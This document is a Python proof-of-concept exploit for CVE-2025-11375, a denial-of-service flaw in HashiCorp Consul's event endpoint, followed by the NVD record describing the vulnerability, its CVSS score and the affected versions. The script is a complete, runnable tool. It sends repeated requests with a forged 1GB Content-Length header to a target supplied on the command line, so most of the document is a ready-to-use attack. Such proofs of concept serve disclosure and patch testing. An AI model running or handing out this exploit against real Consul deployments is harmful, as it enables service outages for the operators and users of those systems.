CVE-2025-11375

#!/usr/bin/env python3 """ CVE-2025-11375 PoC - Consul DoS via Large Content-Length This PoC demonstrates the DoS vulnerability in Consul's event endpoint by sending HTTP requests with extremely large Content-Length values. """ import requests import argparse import time def exploit_consul_dos(target_url, token, num_requests=10): """ Send malicious requests with large Content-Length to Consu event endpoint Args: target_url: Base URL of Consul instance token: Consul ACL token (requires event:write permission) num_requests: Number of malicious requests to send """ headers = { 'X-Consul-Token': token, 'Content-Type': 'application/json', # Malicious large Content-Length value 'Content-Length': '1073741824' # 1GB } # Minimal or empty body while Content-Length claims huge size payload = '{"Name": "test-event"}' endpoint = f"{target_url}/v1/event/fire" print(f"[*] Targeting: {endpoint}") print(f"[*] Sending {num_requests} malicious requests with Content-Length: 1073741824") for i in range(num_requests): try: response = requests.post( endpoint, headers=headers, data=payload, timeout=30 ) print(f"[+] Request {i+1}/{num_requests} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request {i+1} failed: {e}") def main(): parser = argparse.ArgumentParser(description='CVE-2025-11375 PoC') parser.add_argument('--target', required=True, help='Consul target URL') parser.add_argument('--token', required=True, help='Consul ACL token') parser.add_argument('--count', type=int, default=10, help='Number of requests') args = parser.parse_args() exploit_consul_dos(args.target, args.token, args.count) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-11375", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:37.470", "lastModified": "2025-12-22T15:55:08.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Consul and Consul Enterprise’s (“Consul”) event endpoint is vulnerable to denial of service (DoS) due to lack of maximum value on the Content Length header. This vulnerability, CVE-2025-11375, is fixed in Consul Community Edition 1.22.0 and Consul Enterprise 1.22.0, 1.21.6, 1.20.8 and 1.18.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "1.18.12", "matchCriteriaId": "DE3AEC9A-D84F-4B7C-9B03-D3B8CE2CD319"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*", "versionEndExcluding": "1.22.0", "matchCriteriaId": "BD19A817-7366-4C2E-ADF9-35DC889EFE58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.19.0", "versionEndExcluding": "1.20.8", "matchCriteriaId": "596686CD-4DE0-4C9A-83CC-F07B0D2014DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.21.0", "versionEndExcluding": "1.21.6", "matchCriteriaId": "8B688D66-7E0A-4969-9187-D5374EDF68B9"}]}]}], "references": [{"url": "https://discuss.hashicorp.com/t/hcsec-2025-28-consuls-event-endpoint-is-vulnerable-to-denial-of-service/76723", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}